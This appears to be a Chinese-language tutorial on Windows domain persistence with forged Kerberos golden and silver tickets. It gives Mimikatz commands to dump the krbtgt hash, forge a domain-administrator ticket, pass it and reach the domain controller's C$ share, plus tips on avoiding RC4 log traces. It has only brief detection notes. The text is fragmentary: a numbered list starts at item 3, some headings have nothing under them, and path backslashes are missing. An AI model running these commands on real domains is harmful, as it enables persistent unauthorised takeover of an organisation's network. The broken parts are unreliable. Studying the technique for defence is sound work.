Windows 权限维持 · 黄金、白银票据

环境：

- 域   控：Windows Server 2022（DC2022）

- 域用户：Windows Server 2022（CN-2022-DU）

原理

Kerberos 认证过程中，客户端（Client）通过身份认证服务（AS）获取 TGT，该票据由 krbtgt 账户的 NTLM Hash 加密。由于 krbtgt 的 Hash 值固定且 TGT 的会话密钥（LogonSessionKey）不会保存在 KDC（密钥分发中心）中，渗透人员一旦获取 krbtgt 账户的 NTLM Hash，即可伪造合法的 TGT。

TGT 可直接用于与票据授予服务（TGS）交互，无需验证用户密码，即使域管理员修改了密码，渗透人员仍然可以维持权限。

Kerberos TGT

krbtgt（Kerberos TGT）用户是域自带的用户，被密钥分发中心（KDC）所使用，属于 Domain Users 组。在域环境中，每个用户账号的票据都是由 krbtgt 用户生成的。

如果知道了 krbtgt 用户的 NTLM 哈希，就可以伪造域内任意用户的身份。

生成黄金票据的条件

3、其他信息：模拟的任意用户账户名称。

攻击流程

privilege::debug

lsadump::lsa /inject /name:krbtgt

kerberos::golden /user:伪造的用户名 /domain:域名 /sid:域的 SID 值 /krbtgt:krbtgt 账户的 NTLM Hash /id:500

ID:500 表示伪造的黄金票据将关联到域管理员账户（RID 500）。

kerberos::ptt ticket.kirbi

misc::cmd

dir \域控C$

黄金票据特点

• 通过 "票据传递"（Pass The Ticket，PTT）可访问域内所有服务资源。• 票据有效期可自定义，且不受密码策略影响。• 可伪造任意用户身份（如域管理员）。• 无需与 KDC 频繁交互，仅需一次 TGT 伪造即可长期使用。

防御与检测

• 检查事件 ID 4769（TGS 请求）是否伴随合法 TGT（事件 ID 4768），异常情况可能为黄金票据攻击。• 监控对域控共享资源（如 C$）的异常访问（事件 ID 5140）。

privilege::debug

lsadump::lsa /patch

kerberos::golden /domain:hack.com /sid:S-1-5-21-1783398585-996730644-213359695 /service:cifs /target:DC2022 /rc4:b9a04ee56b48ed1c9eddc865f8b5fe1f /user:silver /ptt

misc::cmd

dir \DC2022C$

不同服务的白银票据生成示例

注意事项

• 服务类型限制：白银票据仅对指定服务有效（如 CIFS、LDAP 等），无法像黄金票据一样访问所有服务。

• 票据有效期：默认有效期为 10 小时（与 Kerberos 策略一致），手动延长（添加 /endin:600 参数设置 600 分钟）。

• 防御规避：避免在日志中留下异常记录（如事件 ID 4769 中加密类型为 RC4），可使用 AES 加密的哈希（需替换 /rc4 为 /aes256，但需要获取 AES 密钥）。

防御措施